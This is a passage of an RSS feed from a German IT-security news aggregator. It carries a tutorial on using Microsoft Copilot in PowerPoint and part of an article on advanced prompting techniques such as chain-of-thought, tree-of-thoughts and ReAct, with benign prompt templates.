<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=karpathys+claudemd+template+5800%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 15:11:10 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 15:11:10 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=karpathys+claudemd+template+5800%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=karpathys+claudemd+template+5800%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[10 cool things Copilot can do in PowerPoint]]></title>
<description><![CDATA[Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are vis...]]></description>
<link>https://tsecurity.de/de/3694773/ai-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694773/ai-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are visually appealing.</p>



<p class="wp-block-paragraph">In PowerPoint, Microsoft’s Copilot AI assistant can now automate the heavy lifting of presentation creation. It can generate a first-draft presentation in minutes, then help you edit it. You can also prompt Copilot to help you quickly understand the contents of a presentation and glean insights from it. Use the tips in this guide to save oodles of time as you create and work with presentations.</p>



<h3 class="wp-block-heading">Who can use Copilot in PowerPoint</h3>



<p class="wp-block-paragraph">Individuals with a <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/individuals" target="_blank" rel="noreferrer noopener">Microsoft 365 Personal, Family, or Premium</a> subscription have access to Copilot from within PowerPoint and other Microsoft 365 apps. Users with a Premium plan have <a href="https://support.microsoft.com/en-US/Microsoft-365-Copilot/ai-credits-and-limits-for-microsoft-365-subscriptions" target="_blank" rel="noreferrer noopener">higher Copilot usage allowances</a> and access to advanced AI features.</p>



<p class="wp-block-paragraph">For business users, it’s more complicated. Organizations with more than 2,000 users must pay for <a href="https://www.computerworld.com/article/1629974/m365-copilot-microsofts-generative-ai-tool-explained.html">Microsoft 365 Copilot</a> licenses for their users in addition to their regular Microsoft 365 licenses. Users at organizations with fewer than 2,000 users can use Copilot within M365 apps even without the M365 Copilot add-on licenses, but there are <a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">limitations</a> in usage, speed, and feature availability.</p>



<p class="wp-block-paragraph">To see what kind of access you have, log in to Microsoft’s <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat web hub</a> and look for your name in the lower left corner. If you see “M365 Copilot (Premium)” under your name, you can use Copilot in M365 apps with priority access and advanced features. “M365 Copilot (Basic)” means you can use Copilot in M365 apps with lower-priority access and limited features. If you see “Copilot Chat (Basic)” or nothing below your name, you can’t use Copilot in M365 apps.</p>



<p class="wp-block-paragraph"><em>(Copilot Chat Basic users do get some Copilot functionality, including the ability to generate presentations, via the Copilot Chat hub. See our <a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat tutorial</a> for details.)</em></p>



<h4 class="wp-block-heading"><strong>In this article:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#sidebar">Working with Copilot in PowerPoint</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#template">Create a presentation template</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#pres-from-doc">Create a presentation from a document</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#slide-from-doc">Add content from a document to a slide</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#refine-text">Refine your slide text</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#image">Find or create an image</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#expand">Expand your presentation with relevant slides</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#summarize">Summarize a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#answer-questions">Answer questions about a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#navigate">Help you navigate a large presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#speaker-notes">Generate speaker notes and/or an FAQ</a></li>
</ul>



<h2 class="wp-block-heading">Working with Copilot in PowerPoint</h2>



<p class="wp-block-paragraph">First, let’s quickly go over the notable settings of the Copilot sidebar.</p>



<p class="wp-block-paragraph">When you have a presentation open in PowerPoint, click the Copilot icon; it may be floating at the lower-right corner of your PowerPoint window or parked at the right end of the Ribbon toolbar. The Copilot sidebar will open along the right of the page. You’ll type your prompts to Copilot inside the chat window in this pane.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-01-sidebar.png?w=1024" alt="powerpoint screen with copilot sidebar open on right" class="wp-image-4195065" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The sidebar on the right is where you interact with Copilot in PowerPOint.</p><br></figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph"><strong>Agent mode:</strong> By default, Copilot can build a new presentation or make changes to an existing one in the main PowerPoint window. This is known as “agent mode.” To change this so that Copilot can’t take direct action on a presentation (all its responses appear in the sidebar), click the <em>Allow editing</em> button above the chat window and change it to <em>Chat only</em>.</p>



<p class="wp-block-paragraph">The tips in this guide require that Copilot be in agent mode, so make sure you see <em>Allow editing</em> above the chat window.</p>



<p class="wp-block-paragraph"><strong>Choice of AI model:</strong> Behind the scenes, Copilot has access to various genAI models, including different versions of Anthropic Claude and OpenAI GPT.  By default, it decides which model to use based on your prompt. You can set it to use a particular model: click <em>Auto</em> at the upper right of the Copilot pane and select a model from the dropdown that opens.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-02-sidebar-model-dropdown.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with models dropdown menu open" class="wp-image-4195063" width="1024" height="697" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>You can choose which AI model you want Copilot to use for a request.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">The tips in this guide should work fine on the default <em>Auto</em> setting. But feel free to experiment switching to specific models to see which give you the best results for particular tasks.</p>



<p class="wp-block-paragraph"><strong>Important:</strong> Remember that <a href="https://www.computerworld.com/article/4059383/openai-admits-ai-hallucinations-are-mathematically-inevitable-not-just-engineering-flaws.html">generative AI output often includes errors</a>, so always check Copilot’s output for accuracy. (Also see our <a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">tips for reducing hallucinations in Copilot</a>.) You’ll likely want to rewrite it in your own voice as you’re reviewing it.</p>



<h2 class="wp-block-heading"><a></a>1. Create a presentation template</h2>



<p class="wp-block-paragraph">For many people, the hardest part of creating a presentation is getting started. What types of information should be included on the slides, and in what order? Copilot can give you a leg up by creating the type of presentation you need, with placeholder data that you can later replace with your own.</p>



<p class="wp-block-paragraph">Start a new presentation, open the Copilot sidebar, and type your prompt into the chat window. It’s best to provide very specific details in your prompt. The more context or details you provide, the more likely Copilot will generate a presentation template that suits your needs.</p>



<p class="wp-block-paragraph">A good prompt should contain the slide count, subject, audience, and tone. Example:</p>



<ul class="wp-block-list">
<li><em>Create a 6-slide presentation for a sales meeting focusing on Q1 revenue. The audience is the sales team, so keep the tone professional and focused on the sales data.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot may ask a series of follow-up questions, such as your preferred visual style and desired level of detail. Then it will generate a presentation template.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-03-generated-presentation-with-placeholder-data.png?w=1024" alt="screenshot of powerpoint presentation generated by copilot with placeholder data" class="wp-image-4195064" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot generates a presentation with placeholder data and explains its elements.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">You can optionally prompt Copilot for revisions, and when you’re happy with the template, swap in your own data.</p>



<h2 class="wp-block-heading"><a></a>2. Create a presentation from a document</h2>



<p class="wp-block-paragraph">You can attach a document (such as a Word document, Excel spreadsheet, or PDF) and prompt Copilot to generate a presentation based on its contents. This works best with a structured-format document (such as a business plan, project proposal, or summary report) that contains sections with headings.</p>



<p class="wp-block-paragraph">Copilot can extract the document’s text and structure to generate the slide content for the new presentation. This can especially be useful for quickly turning a long report into a visually appealing presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, click the <em>+</em> icon at the bottom of the chat window. A list of documents that you’ve recently accessed appears. Select the one that you want Copilot to use. Alternatively, click the magnifying glass icon and inside its search box, type a few letters of the filename for the document you want. (Business users with an M365 Copilot license can select up to five files for Copilot to pull from when creating a presentation.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-04-attach-document.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with a document being attached for copilot to base a presentation on" class="wp-image-4195062" width="1024" height="733" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Attaching a document for Copilot to base a presentation on.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Then in the chat window, you can enter a prompt that’s as simple as “<em>Create a presentation</em>,” although as always, providing more details and context is better. This is especially important for corporate users who reference multiple source files. It’s useful to tell Copilot what data to pull from each document.</p>



<p class="wp-block-paragraph">Answer any follow-up questions that Copilot asks, and it will then generate the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-05-generated-presentation-from-doc.png?w=1024" alt="screenshot of powerpoint with a presentation generated by copilot from a document" class="wp-image-4195067" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot has generated a professional presentation from a social media marketing campaign document.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note: Your marketing department may have created one or more <a href="https://support.microsoft.com/en-US/PowerPoint/copilot/keep-your-presentation-on-brand-with-copilot" target="_blank" rel="noreferrer noopener">branded company templates for Copilot to work from</a>. If that’s the case at your organization, simply open the appropriate company template as your first step. Then you can upload docs and type a prompt as described above. Copilot will create a presentation using the branded template.</p>



<h2 class="wp-block-heading"><a></a>3. Add content from a document to a slide</h2>



<p class="wp-block-paragraph">Manually copying text or other content from a document and pasting it into a new slide is a chore. Instead, you can prompt Copilot to extract information directly from a Word document, Excel spreadsheet, or PDF to create new slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, attach the document using the same steps described in tip 2, then tell Copilot to create a slide from the document. As always, it helps to provide details such as the new slide’s focus or what data to include:</p>



<ul class="wp-block-list">
<li><em>Add a slide based on the attached document.</em></li>



<li><em>Use the attached file to add a slide about the project budget that focuses on Q1 projections.</em></li>



<li><em>Summarize only the financial section of the attached document as a slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-06-generated-slide-from-spreadsheet.png?w=1024" alt="screenshot of a slide in powerpoint generated by copilot from spreadsheet data" class="wp-image-4195068" width="1024" height="612" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A new Copilot-generated slide based on data from an Excel spreadsheet.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a><a></a>4. Refine your slide text</h2>



<p class="wp-block-paragraph">A presentation should be visual and display only the core message. Conciseness and proper writing tone are essential for your slides, so that they don’t lose the attention of your audience.</p>



<p class="wp-block-paragraph">You can prompt Copilot to refine text on an individual slide in various ways, such as rewriting it in a more professional tone or making it more concise. Highlight the text inside a text box on the slide. On the toolbar that appears over the highlighted text, click <em>Edit with Copilot</em>.</p>



<p class="wp-block-paragraph">On the menu that opens, you can select a preset prompt to refine the text, such as <em>Condense</em> or <em>Make professional</em>. Or, at the top of this menu, you can type a prompt to rewrite the highlighted text.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-07-refine-slide-text-options-menu.png" alt="screenshot of text on a powerpoint slide with copilot dropdown menu includng condense and make professional options" class="wp-image-4195066" width="960" height="690" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="wp-element-caption"><p>Choose a preset prompt for refining text on a slide or type in your own prompt.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note that this feature affects all the text inside the text box. To rewrite only a portion of text inside a text box, you must split that portion out into a separate text box.</p>



<p class="wp-block-paragraph">Alternatively, you can prompt Copilot to analyze your entire presentation and tighten up the wording throughout all of its slides. For example:</p>



<ul class="wp-block-list">
<li><em>Make these slides more visual and use less text.</em></li>
</ul>



<h2 class="wp-block-heading">5. Find or create an image</h2>



<p class="wp-block-paragraph">If you have Copilot generate a presentation from an existing Word document that contains images, it will incorporate those images into the presentation. If there are no images in the source document, you can ask Copilot to find or create one and add it to a slide.</p>



<p class="wp-block-paragraph">To add a stock image or an image from your organization’s brand library, tell Copilot what you’re looking for:</p>



<ul class="wp-block-list">
<li><em>Add a stock photo of young adults in a cafe drinking boba tea.</em></li>



<li><em>Add a photo from our asset library of young adults in a cafe drinking boba tea.</em></li>
</ul>



<p class="wp-block-paragraph">To have Copilot create an image using Microsoft’s Designer image generation tool, describe your desired image. As always, specificity is helpful:</p>



<ul class="wp-block-list">
<li><em>Create a photorealistic image of a diverse group of 5 or 6 fashionable young adults sitting in a cafe drinking boba tea. They’re smiling or laughing, and some are looking at their phones.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-08-generate-image.png?w=1024" alt="screenshot of image generation prompt in copilot sidebar in powerpoint plus the resulting generated image on a slide" class="wp-image-4195097" width="1024" height="594" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot in PowerPoint hooks into Microsoft’s Designer tool for image generation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Just as you need to review any text output from Copilot, take a close look at generated images to be sure nothing looks off. </p>



<p class="wp-block-paragraph">Also note that Copilot image generation isn’t always reliable in PowerPoint. For some time during our testing for this story, Copilot said it couldn’t create an image because “the image generation service is returning a server error on every attempt.” After about a day and a half, the service began working again.</p>



<h2 class="wp-block-heading"><a></a>6. Expand your presentation with relevant slides</h2>



<p class="wp-block-paragraph">As you’re building your presentation, you may find that it’s become text heavy. Or perhaps it could use more visually oriented slides to break things up and make its progression flow better. Copilot can generate and insert new slides that are based on the content of the slides already in the presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, specify exactly where you want the new slide to go. This helps Copilot to analyze the content of the slides before and after where you want the new slide. Then it can generate a slide to bridge between the two slides. Examples:</p>



<ul class="wp-block-list">
<li><em>Add a slide after slide 3 about our competitive advantages.</em></li>



<li><em>Add a slide after slide 11 that transitions to slide 12.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-09-generated-transition-slide.png?w=1024" alt="screenshot of powerpoint screen with copilot sidebar and a transition slide generated by copilot" class="wp-image-4195094" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Need a transition slide? Just ask!</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading">7. Summarize a presentation</h2>



<p class="wp-block-paragraph">Maybe you need a quick refresh of your presentation before an important meeting. Or maybe a co-worker has sent you a presentation that’s packed with lots of slides. You can prompt Copilot to generate a summary of the presentation’s overall messaging.</p>



<p class="wp-block-paragraph">In the Copilot pane, just type “<em>summarize this presentation</em>.” You can also have Copilot flag key slides that contain important information: “<em>show me key slides</em>.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-10-summarize-key-slides.png?w=1024" alt="screenshots of copilot sidebar in powerpoint - one with summarize results and one with key slides response" class="wp-image-4195095" width="1024" height="774" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot to summarize a presentation or flag key slides.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>8. Answer questions about a presentation</h2>



<p class="wp-block-paragraph">As you’re reviewing a presentation, especially one that you didn’t create and are not familiar with, you can get Copilot to pull key data points from its slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, type specific informational questions. Examples:</p>



<ul class="wp-block-list">
<li><em>What are the action items in this deck?</em></li>



<li><em>What is the proposed budget mentioned here?</em></li>
</ul>



<p class="wp-block-paragraph">If Copilot can’t find the exact answer to the question you ask, it will provide related information from the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-11-ask-questions-about-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response to query about proposed budget in the slide deck" class="wp-image-4195093" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot specific questions about the contents of a presentation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">This method can also help you validate that your presentation includes everything you want it to. If you ask Copilot about the action items in a presentation and it can’t find any, you know you need to add them. (Copilot will likely offer to generate them for you based on the rest of the slides.)</p>



<p class="wp-block-paragraph">You can even take this tactic a step further and ask Copilot if the presentation is missing any important data, if any slides are weak or confusing, if there are any awkward transitions, if there are key points that should be better emphasized, and so on.</p>



<h2 class="wp-block-heading"><a></a>9. Help you navigate a large presentation</h2>



<p class="wp-block-paragraph">In the business world, presentations with dozens of slides are not uncommon, such as for financial reports or project documentation. Trying to find a specific slide or multiple slides can be tough. Copilot can help you navigate such a presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, prompt Copilot to find slides based on specific topics. Example:</p>



<ul class="wp-block-list">
<li><em>Show me the slides about the project timeline.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will analyze the presentation and reply with a list of links to the relevant slides. Click one of these to jump directly to that slide.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-12-navigate-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response about the slide that talks about target audience" class="wp-image-4195096" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can help you zoom directly to a slide that covers a particular topic or shows specific data.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>10. Generate speaker notes and/or an FAQ</h2>



<p class="wp-block-paragraph">Here’s a great timesaver when you’re preparing to show your presentation to an audience: Copilot can automatically generate suggested speaker notes for you, based on the content of your slides. Example prompt:</p>



<ul class="wp-block-list">
<li><em>Write speaker notes for every slide with one talking point per slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-13-speaker-notes.png?w=1024" alt="screenshot of powerpoint presentation with speaker notes generated by copilot" class="wp-image-4195092" width="1024" height="607" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can create speaker notes in seconds.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">In a related feature, Copilot can create a frequently asked questions list (FAQ) for you to consult in your speaker notes or to present as a slide:</p>



<ul class="wp-block-list">
<li><em>Write an FAQ for these slides.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will ask where you want the questions and answers added — as a new slide at the end, integrated into the speaker notes of relevant slides, or somewhere else that you designate. Make a selection, and Copilot will generate the FAQ based on the content of your presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-14-generated-faq-slide.png?w=1024" alt="screenshot of frequently asked questions slide generated by copilot in powerpoint" class="wp-image-4195091" width="1024" height="609" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A Copilot-generated FAQ slide.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h4 class="wp-block-heading"><strong>Related reading:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/1647230/powerpoint-for-microsoft-365-cheat-sheet.html">PowerPoint for Microsoft 365 cheat sheet</a></li>



<li><a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat: Your hub for document creation and analysis</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/1682358/microsoft-cheat-sheets-dive-into-windows-and-office-apps.html">More Microsoft tips and tutorials</a></li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop asking AI nicely: Here’s how to get work-ready results every time]]></title>
<description><![CDATA[Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation fo...]]></description>
<link>https://tsecurity.de/de/3694396/it-security-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694396/it-security-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation for reliable, measurable outcomes. I want to share the techniques that consistently delivered the biggest gains in my projects, complete with real before-and-after examples, copy-paste templates, lessons from failures and guidance on when to evolve beyond prompting to agentic systems.</p>



<h2 class="wp-block-heading">Why advanced prompting still matters in enterprise settings</h2>



<p class="wp-block-paragraph">Sophisticated prompting remains essential for control, reliability and compliance. If you “ask nicely” and hope for the best, you need deterministic behavior, auditable reasoning and minimal risk of hallucination. Here’s what worked for me.</p>



<h3 class="wp-block-heading">1. Chain-of-Thought (CoT) and its variants: Unlocking step-by-step reasoning</h3>



<p class="wp-block-paragraph"><strong>The problem:</strong> Models would jump to conclusions on complex analysis tasks, especially involving data interpretation or multi-step logic.</p>



<p class="wp-block-paragraph"><strong>What I did:</strong> I started explicitly instructing the model to “think step by step” and show its reasoning.</p>



<p class="wp-block-paragraph"><strong>Before (basic prompt): </strong>“Analyze last quarter’s sales data and recommend three actions.”</p>



<p class="wp-block-paragraph"><strong>After (CoT prompt):</strong></p>



<p class="wp-block-paragraph">“You’re a senior business analyst. Analyze the following sales data step by step: [data]. First, identify the key trends. Second, calculate the rates and anomalies. Third, link findings to business context. Finally, recommend the three prioritized actions with expected impact. Explain your reasoning at each step.”  </p>



<p class="wp-block-paragraph"><strong>Results:</strong> Accuracy and depth improved dramatically.</p>



<p class="wp-block-paragraph"><strong>Variants that worked well:</strong> Self-consistency. I ran the same CoT prompt multiple times and took the majority consensus. This reduced variability significantly.</p>



<p class="wp-block-paragraph"><strong>Template you can use:</strong></p>



<pre class="wp-block-code"><code>You are [expert role]. Solve this problem by thinking step by step.

[Task or question]

For each step:

1. State your observation or calculation.

2. Explain the implication.

3. Proceed only when confident.

Final answer in this format: [structured output]</code></pre>



<h3 class="wp-block-heading">2. Tree-of-Thoughts (ToT): Exploring multiple reasoning paths</h3>



<p class="wp-block-paragraph">For truly complex decisions such as resource allocation or risk assessment, linear CoT isn’t enough. Tree-of-Thoughts lets the model generate and evaluate multiple branches.</p>



<p class="wp-block-paragraph"><strong>Example:</strong> I was helping a client evaluate three potential vendor platforms for an AI deployment. A standard prompt gave a superficial comparison. With ToT</p>



<p class="wp-block-paragraph"><strong>Prompt Snippet:</strong></p>



<pre class="wp-block-code"><code>Explore three different reasoning paths for selecting the best vendor platform:

Path 1: Focus on cost and scalability.

Path 2: Focus on security, compliance and integration.

Path 3: Focus on innovation and long-term roadmap.

For each path, evaluate pros/cons against our requirements [list].

Then, compare the paths and recommend the strongest overall option with justification.</code></pre>



<p class="wp-block-paragraph"><strong>Outcome:</strong> The model surfaced nuanced trade-offs (e.g., one vendor had superior security, but higher integration cost).</p>



<p class="wp-block-paragraph"><strong>When to use:</strong> Strategic planning, troubleshooting or scenarios with high uncertainty and multiple viable approaches.</p>



<h3 class="wp-block-heading">3. ReAct (Reason+ Act) and prompt chaining: Moving toward agentic behavior</h3>



<p class="wp-block-paragraph">One of the biggest leaps I have noticed comes from combining reasoning with tool use and chaining prompts.</p>



<p class="wp-block-paragraph"><strong>ReAct example</strong>: (used in data analytics workflow)</p>



<pre class="wp-block-code"><code>You are an AI analyst with access to tools. For the query below:

1. Reason about what information you need.

2. Choose the appropriate tool or action.

3. Observe the result.

4. Repeat until you can answer confidently.

Query: [user request]</code></pre>



<p class="wp-block-paragraph">In practice, I chained this with retrieval tools. One automated quarterly compliance reporting; the system reasoned about required data, pulled relevant records, validated them, and generated the reports.</p>



